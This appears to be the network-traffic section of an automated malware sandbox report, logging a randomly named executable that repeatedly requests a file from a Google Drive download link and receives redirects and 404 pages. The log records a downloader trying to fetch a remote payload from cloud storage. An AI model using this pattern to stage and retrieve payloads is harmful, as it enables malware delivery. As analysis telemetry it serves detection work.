                                                                          2025-01-10 14:32:19 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 5f 4b 48 69 6c 43 36 4f 4f 51 4c 68 51 55 68 32 67 49 36 4f 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="B_KHilC6OOQLhQUh2gI6OA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.11.2049750142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:30 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:30 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:30 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-utHyYCJRjBhumjw0etxrGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.11.2049751142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:30 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:31 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5BU9c99SYDNTRGFvVENQyj46YaRcBipwEyxNsKmO8-d16nHi1RXCQmXEPmY8FKIEDt
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:31 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-IKIsCl_XsgTFIpEaBBGV0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:32:31 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 47 46 62 63 30 46 72 36 5f 4a 66 62 61 68 64 62 51 5f 69 46 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TGFbc0Fr6_JfbahdbQ_iFA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.11.2049752142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:41 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:41 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:41 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-IsahVzFmZJapa9lR62IyUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.11.2049753142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:42 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:42 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC77vVWG8zv1oikIQqRX_5zPlkDD9ufthX9c9uPCe3w68TtvECDDF_tqj7IExgwe1FTQf6_IX_s
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:42 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-_RsSWx8ndAptCJ5WgTnBew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:32:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 49 72 31 74 72 58 39 34 6c 52 48 30 71 5a 4a 2d 6b 44 51 42 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mIr1trX94lRH0qZJ-kDQBg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.11.2049754142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:52 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:53 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:52 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: script-src 'nonce-gudzIBQxhe73f-K1dXUa9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.11.2049755142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:32:53 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:32:53 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC41J0T9rcwAmomBrR5aj2KfVX_uwSnsubyD5rR_edViruEMXNBweUxlqUOwtQh9uNGp
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:32:53 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-6q3oQVu49o-Zlobz29u_iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:32:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 63 6d 57 42 39 6d 73 79 48 76 45 62 35 44 50 79 65 6d 38 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DcmWB9msyHvEb5DPyem8cA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.11.2049756142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:03 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:04 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:04 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-LGrvnoOdpWo18uncPgPbrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          11192.168.11.2049757142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:04 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:04 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgS7PyZKIdu5fsvm96mx7w5dvyIfBsgC8eY2aGpW8MzvaqTUz6Leup5ZZjrsgqP1pmE3
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
